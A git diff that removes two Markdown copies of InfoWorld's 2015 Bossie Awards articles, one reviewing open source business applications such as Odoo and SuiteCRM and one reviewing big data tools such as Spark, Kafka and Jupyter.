-Applications -- ERP, CRM, HRM, CMS, BPM -- are not only fertile ground for three-letter acronyms, they're the engines behind every modern business. Our top picks in the category include back- and front-office solutions, marketing automation, lightweight middleware, heavyweight middleware, and other tools for moving data around, mixing it together, and magically transforming it into smarter business decisions.
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-xtuple-100614684-orig.jpg)
-
-### xTuple ###
-
-Small and midsize companies with light manufacturing or distribution needs have a friend in [xTuple][1]. This modular ERP/CRM combo bundles operations and financial control, product and inventory management, and CRM and sales support. Its relatively simple install lets you deploy all of the modules or only what you need today -- helping trim support costs without sacrificing customization later.
-
-This summer’s release brought usability improvements to the UI and a generous number of bug fixes. Recent updates also yielded barcode scanning and label printing for mobile warehouse workers, an enhanced workflow module (built with Plv8, a wrapper around Google’s V8 JavaScript engine that lets you write stored procedures for PostgreSQL in JavaScript), and quality management tools that are sure to get mileage on shop floors.
-
-The xTuple codebase is JavaScript from stem to stern. The server components can all be installed locally, in xTuple’s cloud, or deployed as an appliance. A mobile Web client, and mobile CRM features, augment a good native desktop client.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-odoo-100614678-orig.jpg)
-
-### Odoo ###
-
-[Odoo][2] used to be known as OpenERP. Last year the company raised private capital and broadened its scope. Today Odoo is a one-stop shop for back office and customer-facing applications -- replete with content management, business intelligence, and e-commerce modules.
-
-Odoo 8 fronts accounting, invoicing, project management, resource planning, and customer relationship management tools with a flexible Web interface that can be tailored to your company’s workflow. Add-on modules for warehouse management and HR, as well as for live chat and analytics, round out the solution.
-
-This year saw Odoo focused primarily on usability updates. A recently released sales planner helps sales groups track KPIs, and a new tips feature lends in-context help. Odoo 9 is right around the corner with alpha builds showing customer portals, Web form creation tools, mobile and VoIP services, and integration hooks to eBay and Amazon.
-
-Available for Windows and Linux, and as a SaaS offering, Odoo gives small and midsized companies an accessible set of tools to manage virtually every aspect of their business.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-idempiere-100614673-orig.jpg)
-
-### iDempiere ###
-
-Small and midsize companies have great choices in Odoo and xTuple. Larger manufacturing and distribution companies will need something more. For them, there’s [iDempiere][3] -- a well maintained offshoot of ADempiere with OSGi modularity.
-
-iDempiere implements a fully loaded ERP, supply chain, and CRM suite right out of the box. Built with Java, iDempiere supports both PostgreSQL and Oracle Database, and it can be customized extensively through modules built to the OSGi specification. iDempiere is perfectly suited to managing complex business scenarios involving multiple partners, requiring dynamic reporting, or employing point-of-sale and warehouse services.
-
-Being enterprise-ready comes with a price. iDempiere’s feature-rich tools and complexity impose a steep learning curve and require a commitment to integration support. Of course, those costs are offset by savings from the software’s free GPL2 licensing. iDempiere’s easy install script, small resource footprint, and clean interface also help alleviate some of the startup pains. There’s even a virtual appliance available on Sourceforge to get you started.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-suitecrm-100614680-orig.jpg)
-
-### SuiteCRM ###
-
-SugarCRM held the sweet spot in open source CRM since, well, forever. Then last year Sugar announced it would no longer contribute to the open source Community Edition. Into the ensuing vacuum rushed [SuiteCRM][4] – a fork of the final Sugar code.
-
-SuiteCRM 7.2 creates an experience on a par with SugarCRM Professional’s marketing, sales, and service tools. With add-on modules for workflow, reporting, and security, as well as new innovations like Lucene-driven search, taps for social media, and a beta reveal of new desktop notifications, SuiteCRM is on solid footing.
-
-The Advanced Open Sales module provides a familiar migration path from Sugar, while commercial support is available from the likes of [SalesAgility][5], the company that forked SuiteCRM in the first place. In little more than a year, SuiteCRM rescued the code, rallied an inspired community, and emerged as a new leader in open source CRM. Who needs Sugar?
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-civicrm-100614671-orig.jpg)
-
-### CiviCRM ###
-
-We typically focus attention on CRM vis-à-vis small and midsize business requirements. But nonprofit and advocacy groups need to engage with their “customers” too. Enter [CiviCRM][6].
-
-CiviCRM addresses the needs of nonprofits with tools for fundraising and donation processing, membership management, email tracking, and event planning. Granular access control and security bring role-based permissions to views, keeping paid staff and volunteers partitioned and productive. This year CiviCRM continued to develop with new features like simple A/B testing and monitoring for email campaigns.
-
-CiviCRM deploys as a plug-in to your WordPress, Drupal, or Joomla content management system -- a dead-simple install if you already have one of these systems in place. If you don’t, CiviCRM is an excellent reason to deploy the CMS. It’s a niche-filling solution that allows nonprofits to start using smarter, tailored tools for managing constituencies, without steep hurdles and training costs.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-mautic-100614677-orig.jpg)
-
-### Mautic ###
-
-For marketers, the Internet -- Web, email, social, all of it -- is the stuff dreams are made on. [Mautic][7] allows you to create Web and email campaigns that track and nurture customer engagement, then roll all of the data into detailed reports to gain insight into customer needs and wants and how to meet them.
-
-Open source options in marketing automation are few, but Mautic’s extensibility stands out even against closed solutions like IBM’s Silverpop. Mautic even integrates with popular third-party email marketing solutions (MailChimp, Constant Contact) and social media platforms (Facebook, Twitter, Google+, Instagram) with quick-connect widgets.
-
-The developers of Mautic could stand to broaden the features for list segmentation and improve the navigability of their UI. Usability is also hindered by sparse documentation. But if you’re willing to rough it out long enough to learn your way, you’ll find a gem -- and possibly even gold -- in Mautic.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-orangehrm-100614679-orig.jpg)
-
-### OrangeHRM ###
-
-The commercial software market in the human resource management space is rather fragmented, with Talent, HR, and Workforce Management startups all vying for a slice of the pie. It’s little wonder the open source world hasn’t found much direction either, with the most ambitious HRM solutions often locked inside larger ERP distributions. [OrangeHRM][8] is a standout.
-
-OrangeHRM tackles employee administration from recruitment and applicant tracking to performance reviews, with good audit trails throughout. An employee portal provides self-serve access to personal employment information, time cards, leave requests, and personnel documents, helping reduce demands on HR staff.
-
-OrangeHRM doesn’t yet address niche aspects like talent management (social media, collaboration, knowledge banks), but it’s remarkably full-featured. Professional and Enterprise options offer more advanced functionality (in areas such as recruitment, training, on/off-boarding, document management, and mobile device access), while community modules are available for the likes of Active Directory/LDAP integration, advanced reporting, and even insurance benefit management.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-libreoffice-100614675-orig.jpg)
-
-### LibreOffice ###
-
-[LibreOffice][9] is the easy choice for best open source office productivity suite. Originally forked from OpenOffice, Libre has been moving at a faster clip than OpenOffice ever since, drawing more developers and producing more new features than its rival.
-
-LibreOffice 5.0, released only last month, offers UX improvements that truly enhance usability (like visual previews to style changes in the sidebar), brings document editing to Android devices (previously a view-only prospect), and finally delivers on a 64-bit Windows codebase.
-
-LibreOffice still lacks a built-in email client and a personal information manager, not to mention the real-time collaborative document editing available in Microsoft Office. But Libre can run off of a USB flash disk for portability, natively supports a greater number of graphic and file formats, and creates hybrid PDFs with embedded ODF files for full-on editing. Libre even imports Apple Pages documents, in addition to opening and saving all Microsoft Office formats.
-
-LibreOffice has done a solid job of tightening its codebase and delivering enhancements at a regular clip. With a new cloud version under development, LibreOffice will soon be more liberating than ever.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-bonita-100614672-orig.jpg)
-
-### Bonita BPM ###
-
-Open source BPM has become a mature, cost-effective alternative to the top proprietary solutions. Having led the charge since 2009, Bonitasoft continues to raise the bar. The new [Bonita BPM 7][10] release impresses with innovative features that simplify code generation and shorten development cycles for BPM app creation.
-
-Most important to the new version, though, is better abstraction of underlying core business logic from UI and data components, allowing UIs and processes to be developed independently. This new MVC approach reduces downtime for live upgrades (no more recompilation!) and eases application maintenance.
-
-Bonita contains a winning set of connectors to a broad range of enterprise systems (ERP, CRM, databases) as well as to Web services. Complementing its process weaving tools, a new form designer (built on AngularJS/Bootstrap) goes a long way toward improving UI creation for the Web-centric and mobile workforce.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-camunda-100614670-orig.jpg)
-
-### Camunda BPM ###
-
-Many open source solutions, like Bonita BPM, offer solid, drop-in functionality. Dig into the code base, though, and you may find it’s not the cleanest to build upon. Enterprise Java developers who hang out under the hood should check out [Camunda BPM][11].
-
-Forked from Alfresco Activiti (a creation of former Red Hat jBPM developers), Camunda BPM delivers a tight, Java-based BPMN 2.0 engine in support of human workflow activities, case management, and systems process automation that can be embedded in your Java apps or run as a container service in Tomcat. Camunda’s ecosystem offers an Eclipse plug-in for process modeling and the Cockpit dashboard brings real-time monitoring and management over running processes.
-
-The Enterprise version adds WebSphere and WebLogic Server support. Additional incentives for the Enterprise upgrade include Saxon-driven XSLT templating (sidestepping the scripting engine) and add-ons to improve process management and exception handling.
-
-Camunda is a solid BPM engine ready for build-out and one of the first open source process managers to introduce DMN (Decision Model and Notation) support, which helps to simplify complex rules-based modeling alongside BPMN. DMN support is currently at the alpha stage.
-
--- James R. Borck
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-talend-100614681-orig.jpg)
-
-### Talend Open Studio ###
-
-No open source ETL or EAI solution comes close to [Talend Open Studio][12] in functionality, performance, or support of modern integration trends. This year Talend unleashed Open Studio 6, a new version with a streamlined UI and smarter tooling that brings it more in line with Talend’s cloud-based offering.
-
-Using Open Studio you can visually design, test, and debug orchestrations that connect, transform, and synchronize data across a broad range of real-time applications and data resources. Talend’s wealth of connectors provides support for most any endpoint -- from flat files to Hadoop to Amazon S3. Packaged editions focus on specific scenarios such as big data integration, ESB, and data integrity monitoring.
-
-New support for Java 8 brings a speed boost. The addition of support for MariaDB and for in-memory processing with MemSQL, as well as updates to the ESB engine, keep Talend in step with the community’s needs. Version 6 was a long time coming, but no less welcome for that. Talend Open Studio is still first in managing complex data integration -- in-house, in the cloud, or increasingly, a combination of the two.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-warewolf-100614683-orig.jpg)
-
-### Warewolf ESB ###
-
-Complex integration patterns may demand the strengths of a Talend to get the job done. But for many lightweight microservices, the overhead of a full-fledged enterprise integration solution is extreme overkill.
-
-[Warewolf ESB][13] combines a streamlined .Net-based process engine with visual development tools to provide for dead simple messaging and application payload routing in a native Windows environment. The Warewolf ESB is an “easy service bus,” not an enterprise service bus.
-
-Drag-and-drop tooling in the design studio makes quick work of configuring connections and logic flows. Built-in wizardry handles Web services definitions and database calls, and it can even tap Windows DLLs and the command line directly. Using the visual debugger, you can inspect execution streams (if not yet actually step through them), then package everything for remote deployment.
-
-Warewolf is still a .40.5 release and undergoing major code changes. It also lacks native connectors, easy transforms, and any means of scalability management. Be aware that the precompiled install demands collection of some usage statistics (I wish they would stop that). But Warewolf ESB is fast, free, and extensible. It’s a quirky, upstart project that offers definite benefits to Windows integration architects.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-knime-100614674-orig.jpg)
-
-### KNIME ###
-
-[KNIME][14] takes a code-free approach to predictive analytics. Using a graphical workbench, you wire together workflows from an abundant library of processing nodes, which handle data access, transformation, analysis, and visualization. With KNIME, you can pull data from databases and big data platforms, run ETL transformations, perform data mining with R, and produce custom reports in the end.
-
-The company was busy this year rolling out the KNIME 2.12 update. The new release introduces MongoDB support, XPath nodes with autoquery creation, and a new view controller (based on the D3 JavaScript library) that creates interactive data visualizations on the fly. It also includes additional statistical nodes and a REST interface (KNIME Server edition) that provides services-based access to workflows.
-
-KNIME’s core analytics engine is free open source. The company offers several fee-based extensions for clustering and collaboration. (A portion of your licensing fee actually funds the open source project.) KNIME Server (on-premise or cloud) ups the ante with security, collaboration, and workflow repositories -- all serving to inject analytics more productively throughout your business lines.
-
--- James R. Borck
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-teiid-100614682-orig.jpg)
-
-### Teiid ###
-
-[Teiid][15] is a data virtualization system that allows applications to use data from multiple, heterogeneous data stores. Currently a JBoss project, Teiid is backed by years of development from MetaMatrix and a long history of addressing the data access needs of the largest enterprise environments. I even see [uses for Teiid in Hadoop and big data environments][16].
-
-In essence, Teiid allows you to connect all of your data sources into a “virtual” mega data source. You can define caching semantics, transforms, and other “configuration not code” transforms to load from multiple data sources using plain old SQL, XQuery, or procedural queries.
-
-Teiid is primarily accessible through JBDC and has built-in support for Web services. Red Hat sells Teiid as [JBoss Data Virtualization][17].
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100614676-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][18]
-
-[Bossie Awards 2015: The best open source application development tools][19]
-
-[Bossie Awards 2015: The best open source big data tools][20]
-
-[Bossie Awards 2015: The best open source data center and cloud software][21]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][22]
-
-[Bossie Awards 2015: The best open source networking and security software][23]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982622/open-source-tools/bossie-awards-2015-the-best-open-source-applications.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:http://xtuple.org/
-[2]:http://odoo.com/
-[3]:http://idempiere.org/
-[4]:http://suitecrm.com/
-[5]:http://salesagility.com/
-[6]:http://civicrm.org/
-[7]:https://www.mautic.org/
-[8]:http://www.orangehrm.com/
-[9]:http://libreoffice.org/
-[10]:http://www.bonitasoft.com/
-[11]:http://camunda.com/
-[12]:http://talend.com/
-[13]:http://warewolf.io/
-[14]:http://www.knime.org/
-[15]:http://teiid.jboss.org/
-[16]:http://www.infoworld.com/article/2922180/application-development/database-virtualization-or-i-dont-want-to-do-etl-anymore.html
-[17]:http://www.jboss.org/products/datavirt/overview/
-[18]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[19]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[20]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[21]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[22]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[23]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md b/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md
deleted file mode 100644
index 0cf65ea3a8..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source big data tools.md
+++ /dev/null
@@ -1,287 +0,0 @@
-Bossie Awards 2015: The best open source big data tools
-================================================================================
-InfoWorld's top picks in distributed data processing, streaming analytics, machine learning, and other corners of large-scale data analytics
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-big-data-100613944-orig.jpg)
-
-### The best open source big data tools ###
-
-How many Apache projects can sit on a pile of big data? Fire up your Hadoop cluster, and you might be able to count them. Among this year's Bossies in big data, you'll find the fastest, widest, and deepest newfangled solutions for large-scale SQL, stream processing, sort-of stream processing, and in-memory analytics, not to mention our favorite maturing members of the Hadoop ecosystem. It seems everyone has a nail to drive into MapReduce's coffin.
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-spark-100613962-orig.jpg)
-
-### Spark ###
-
-With hundreds of contributors, [Spark][1] is one of the most active and fastest-growing Apache projects, and with heavyweights like IBM throwing their weight behind the project and major corporations bringing applications into large-scale production, the momentum shows no signs of letting up.
-
-The sweet spot for Spark continues to be machine learning. Highlights since last year include the replacement of the SchemaRDD with a Dataframes API, similar to those found in R and Pandas, making data access much simpler than with the raw RDD interface. Also new are ML pipelines for building repeatable machine learning workflows, expanded and optimized support for various storage formats, simpler interfaces to machine learning algorithms, improvements in the display of cluster resources usage, and task tracking.
-
-On by default in Spark 1.5 is the off-heap memory manager, Tungsten, which offers much faster processing by fine-tuning data structure layout in memory. Finally, the new website, [spark-packages.org][2], with more than 100 third-party libraries, adds many useful features from the community.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-storm-100614149-orig.jpg)
-
-### Storm ###
-
-[Apache Storm][3] is a Clojure-based distributed computation framework primarily for streaming real-time analytics. Storm is based on the [disruptor pattern][4] for low-latency complex event processing created LMAX. Unlike Spark, Storm can do single events as opposed to “micro-batches,” and it has a lower memory footprint. In my experience, it scales better for streaming, especially when you’re mainly streaming to ingest data into other data sources.
-
-Storm’s profile has been eclipsed by Spark, but Spark is inappropriate for many streaming applications. Storm is frequently used with Apache Kafka.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-h2o-100613950-orig.jpg)
-
-### H2O ###
-
-[H2O][5] is a distributed, in-memory processing engine for machine learning that boasts an impressive array of algorithms. Previously only available for R users, version 3.0 adds Python and Java language bindings, as well as a Spark execution engine for the back end. The best way to view H20 is as a very large memory extension of your R environment. Instead of working directly on large data sets, the R extensions communicate via a REST API with the H2O cluster, where H2O does the heavy lifting.
-
-Several useful R packages such as ddply have been wrapped, allowing you to use them on data sets larger than the amount of RAM on the local machine. You can run H2O on EC2, on a Hadoop/YARN cluster, and on Docker containers. With Sparkling Water (Spark plus H2O) you can access Spark RDDs on the cluster side by side to, for example, process a data frame with Spark before passing it to an H2O machine learning algorithm.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-apex-100613943-orig.jpg)
-
-### Apex ###
-
-[Apex][6] is an enterprise-grade, big data-in-motion platform that unifies stream processing as well as batch processing. A native YARN application, Apex processes streaming data in a scalable, fault-tolerant manner and provides all the common stream operators out of the box. One of the best things about Apex is that it natively supports the common event processing guarantees (exactly once, at least once, at most once). Formerly a commercial product by DataTorrent, Apex's roots show in the quality of the documentation, examples, code, and design. Devops and application development are cleanly separated, and user code generally doesn't have to be aware that it is running in a streaming cluster.
-
-A related project, [Malhar][7], offers more than 300 commonly used operators and application templates that implement common business logic. The Malhar libraries significantly reduce the time it takes to develop an Apex application, and there are connectors (operators) for storage, file systems, messaging systems, databases, and nearly anything else you might want to connect to from an application. The operators can all be extended or customized to meet individual business's requirements. All Malhar components are available under the Apache license.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-druid-100613947-orig.jpg)
-
-### Druid ###
-
-[Druid][8], which moved to a commercially friendly Apache license in February of this year, is best described as a hybrid, “event streams meet OLAP” solution. Originally developed to analyze online events for ad markets, Druid allows users to do arbitrary and interactive exploration of time series data. Some of the key features include low-latency ingest of events, fast aggregations, and approximate and exact calculations.
-
-At the heart of Druid is a custom data store that uses specialized nodes to handle each part of the problem. Real-time ingest is managed by real-time nodes (JVMs) that eventually flush data to historical nodes that are responsible for data that has aged. Broker nodes direct queries in a scatter-gather fashion to both real-time and historical nodes to give the user a complete picture of events. Benchmarked at a sustained 500K events per second and 1 million events per second peak, Druid is ideal as a real-time dashboard for ad-tech, network traffic, and other activity streams.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-flink-100613949-orig.jpg)
-
-### Flink ###
-
-At its core, [Flink][9] is a data flow engine for event streams. Although superficially similar to Spark, Flink takes a different approach to in-memory processing. First, Flink was designed from the start as a stream processor. Batch is simply a special case of a stream with a beginning and an end, and Flink offers APIs for dealing with each case, the DataSet API (batch) and the DataStream API. Developers coming from the MapReduce world should feel right at home working with the DataSet API, and porting applications to Flink should be straightforward. In many ways Flink mirrors the simplicity and consistency that helped make Spark so popular. Like Spark, Flink is written in Scala.
-
-The developers of Flink clearly thought out usage and operations too: Flink works natively with YARN and Tez, and it uses an off-heap memory management scheme to work around some of the JVM limitations. A peek at the Flink JIRA site shows a healthy pace of development, and you’ll find an active community on the mailing lists and on StackOverflow as well.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-elastic-100613948-orig.jpg)
-
-### Elasticsearch ###
-
-[Elasticsearch][10] is a distributed document search server based on [Apache Lucene][11]. At its heart, Elasticsearch builds indices on JSON-formatted documents in nearly real time, enabling fast, full-text, schema-free queries. Combined with the open source Kibana dashboard, you can create impressive visualizations of your real-time data in a simple point-and-click fashion.
-
-Elasticsearch is easy to set up and easy to scale, automatically making use of new hardware by rebalancing shards as required. The query syntax isn't at all SQL-like, but it is intuitive enough for anyone familiar with JSON. Most users won't be interacting at that level anyway. Developers can use the native JSON-over-HTTP interface or one of the several language bindings available, including Ruby, Python, PHP, Perl, .Net, Java, and JavaScript.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-slamdata-100613961-orig.jpg)
-
-### SlamData ###
-
-If you are seeking a user-friendly tool to visualize and understand your newfangled NoSQL data, take a look at [SlamData][12]. SlamData allows you to query nested JSON data using familiar SQL syntax, without relocation or transformation.
-
-One of the technology’s main features is its connectors. From MongoDB to HBase, Cassandra, and Apache Spark, SlamData taps external data sources with the industry's most advanced “pushdown” processing technology, performing transformations and analytics close to the data.
-
-While you might ask, “Wouldn’t I be better off building a data lake or data warehouse?” consider the companies that were born in NoSQL. Skipping the ETL and simply connecting a visualization tool to a replica offers distinct advantages -- not only in terms of how up-to-date the data is, but in how many moving parts you have to maintain.
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-drill-100613946-orig.jpg)
-
-### Drill ###
-
-[Drill][13] is a distributed system for interactive analysis of large-scale data sets, inspired by [Google's Dremel][14]. Designed for low-latency analysis of nested data, Drill has a stated design goal of scaling to 10,000 servers and querying petabytes of data and trillions of records.
-
-Nested data can be obtained from a variety of data sources (such as HDFS, HBase, Amazon S3, and Azure Blobs) and in multiple formats (including JSON, Avro, and protocol buffers), and you don't need to specify a schema up front (“schema on read”).
-
-Drill uses ANSI SQL:2003 for its query language, so there's no learning curve for data engineers to overcome, and it allows you to join data across multiple data sources (for example, joining a table in HBase with logs in HDFS). Finally, Drill offers ODBC and JDBC interfaces to connect your favorite BI tools.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-hbase-100613951-orig.jpg)
-
-### HBase ###
-
-[HBase][15] reached the 1.x milestone this year and continues to improve. Like other nonrelational distributed datastores, HBase excels at returning search results very quickly and for this reason is often used to back search engines, such as the ones at eBay, Bloomberg, and Yahoo. As a stable and mature software offering, HBase does not get fresh features as frequently as newer projects, but that's often good for enterprises.
-
-Recent improvements include the addition of high-availability region servers, support for rolling upgrades, and YARN compatibility. Features in the works include scanner updates that promise to improve performance and the ability to use HBase as a persistent store for streaming applications like Storm and Spark. HBase can also be queried SQL style via the [Phoenix][16] project, now out of incubation, whose SQL compatibility is steadily improving. Phoenix recently added a Spark connector and the ability to add custom user-defined functions.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-hive-100613952-orig.jpg)
-
-### Hive ###
-
-Although stable and mature for several years, [Hive][17] reached the 1.0 version milestone this year and continues to be the best solution when really heavy SQL lifting (many petabytes) is required. The community continues to focus on improving the speed, scale, and SQL compliance of Hive. Currently at version 1.2, significant improvements since its last Bossie include full ACID semantics, cross-data center replication, and a cost-based optimizer.
-
-Hive 1.2 also brought improved SQL compliance, making it easier for organizations to use it to off-load ETL jobs from their existing data warehouses. In the pipeline are speed improvements with an in-memory cache called LLAP (which, from the looks of the JIRAs, is about ready for release), the integration of Spark machine learning libraries, and improved SQL constructs like nonequi joins, interval types, and subqueries.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-kylin-100613955-orig.jpg)
-
-### Kylin ###
-
-[Kylin][18] is an application developed at eBay for processing very large OLAP cubes via ANSI SQL, a task familiar to most data analysts. If you think about how many items are on sale now and in the past at eBay, and all the ways eBay might want to slice and dice data related to those items, you will begin to understand the types of queries Kylin was designed for.
-
-Like most other analysis applications, Kylin supports multiple access methods, including JDBC, ODBC, and a REST API for programmatic access. Although Kylin is still in incubation at Apache, and the community nascent, the project is well documented and the developers are responsive and eager to understand customer use cases. Getting up and running with a starter cube was a snap. If you have a need for analysis of extremely large cubes, you should take a look at Kylin.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-cdap-100613945-orig.jpg)
-
-### CDAP ###
-
-[CDAP][19] (Cask Data Access Platform) is a framework running on top of Hadoop that abstracts away the complexity of building and running big data applications. CDAP is organized around two core abstractions: data and applications. CDAP Datasets are logical representations of data that behave uniformly regardless of the underlying storage layer; CDAP Streams provide similar support for real-time data.
-
-Applications use CDAP services for things such as distributed transactions and service discovery to shield developers from the low-level details of Hadoop. CDAP comes with a data ingestion framework and a few prebuilt applications and “packs” for common tasks like ETL and website analytics, along with support for testing, debugging, and security. Like most formerly commercial (closed source) projects, CDAP benefits from good documentation, tutorials, and examples.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-ranger-100613960-orig.jpg)
-
-### Ranger ###
-
-Security has long been a sore spot with Hadoop. It isn’t (as is frequently reported) that Hadoop is “insecure” or “has no security.” Rather, the truth was more that Hadoop had too much security, though not in a good way. I mean that every component had its own authentication and authorization implementation that wasn’t integrated with the rest of platform.
-
-Hortonworks acquired XA/Secure in May, and [a few renames later][20] we have [Ranger][21]. Ranger pulls many of the key components of Hadoop together under one security umbrella, allowing you to set a “policy” that ties your Hadoop security to your existing ACL-based Active Directory authentication and authorization. Ranger gives you one place to manage Hadoop access control, one place to audit, one place to manage the encryption, and a pretty Web page to do it from.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-mesos-100613957-orig.jpg)
-
-### Mesos ###
-
-[Mesos][22], developed at the [AMPLab][23] at U.C. Berkeley that also brought us Spark, takes a different approach to managing cluster computing resources. The best way to describe Mesos is as a distributed microkernel for the data center. Mesos provides a minimal set of operating system mechanisms like inter-process communications, disk access, and memory to higher-level applications, called “frameworks” in Mesos-speak, that run in what is analogous to user space. Popular frameworks for Mesos include [Chronos][24] and [Aurora][25] for building ETL pipelines and job scheduling, and a few big data processing applications including Hadoop, Storm, and Spark, which have been ported to run as Mesos frameworks.
-
-Mesos applications (frameworks) negotiate for cluster resources using a two-level scheduling mechanism, so writing a Mesos application is unlikely to feel like a familiar experience to most developers. Although Mesos is a young project, momentum is growing, and with Spark being an exceptionally good fit for Mesos, we're likely to see more from Mesos in the coming years.
-
--- Steven Nunez
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-nifi-100613958-orig.jpg)
-
-### NiFi ###
-
-[NiFi][26] is an incubating Apache project to automate the flow of data between systems. It doesn't operate in the traditional space that Kafka and Storm do, but rather in the space between external devices and the data center. NiFi was originally developed by the NSA and donated to the open source community in 2014. It has a strong community of developers and users within various government agencies.
-
-NiFi isn't like anything else in the current big data ecosystem. It is much closer to a tradition EAI (enterprise application integration) tool than a data processing platform, although simple transformations are possible. One interesting feature is the ability to debug and change data flows in real time. Although not quite a REPL (read, eval, print loop), this kind of paradigm dramatically shortens the development cycle by not requiring a compile-deploy-test-debug workflow. Other interesting features include a strong “chain of custody,” where each piece of data can be tracked from beginning to end, along with any changes made along the way. You can also prioritize data flows so that time-sensitive information can be received as quickly as possible, bypassing less time-critical events.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-kafka-100613954-orig.jpg)
-
-### Kafka ###
-
-[Kafka][27] has emerged as the de-facto standard for distributed publish-subscribe messaging in the big data space. Its design allows brokers to support thousands of clients at high rates of sustained message throughput, while maintaining durability through a distributed commit log. Kafka does this by maintaining what is essentially a single log file in HDFS. Since HDFS is a distributed storage system that keeps redundant copies, Kafka is protected.
-
-When consumers want to read messages, Kafka looks up their offset in the central log and sends them. Because messages are not deleted immediately, adding consumers or replaying historical messages does not impose additional costs. Kafka has been benchmarked at 2 million writes per second by its developers at LinkedIn. Despite Kafka’s sub-1.0 version number, Kafka is a mature and stable product, in use in some of the largest clusters in the world.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opentsdb-100613959-orig.jpg)
-
-### OpenTSDB ###
-
-[OpenTSDB][28] is a time series database built on HBase. It was designed specifically for analyzing data collected from applications, mobile devices, networking equipment, and other hardware devices. The custom HBase schema used to store the time series data has been designed for fast aggregations and minimal storage requirements.
-
-By using HBase as the underlying storage layer, OpenTSDB gains the distributed and reliable characteristics of that system. Users don't interact with HBase directly; instead events are written to the system via the time series daemon (TSD), which can be scaled out as required to handle high-throughput situations. There are a number of prebuilt connectors to publish data to OpenTSDB, and clients to read data from Ruby, Python, and other languages. OpenTSDB isn't strong on creating interactive graphics, but several third-party tools fill that gap. If you are already using HBase and want a simple way to store event data, OpenTSDB might be just the thing.
-
--- Steven Nunez
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-jupyter-100613953-orig.jpg)
-
-### Jupyter ###
-
-Everybody's favorite notebook application went generic. [Jupyter][29] is “the language-agnostic parts of IPython” spun out into an independent package. Although Jupyter itself is written in Python, the system is modular. Now you can have an IPython-like interface, along with notebooks for sharing code, documentation, and data visualizations, for nearly any language you like.
-
-At least [50 language][30] kernels are already supported, including LISP, R, Ruby, F#, Perl, and Scala. In fact, even IPython itself is simply a Python module for Jupyter. Communication with the language kernel is via a REPL (read, eval, print loop) protocol, similar to [nREPL][31] or [Slime][32]. It is nice to see such a useful piece of software receiving significant [nonprofit funding][33] to further its development, such as parallel execution and multi-user notebooks. Behold, open source at its best.
-
--- Steven Nunez
-
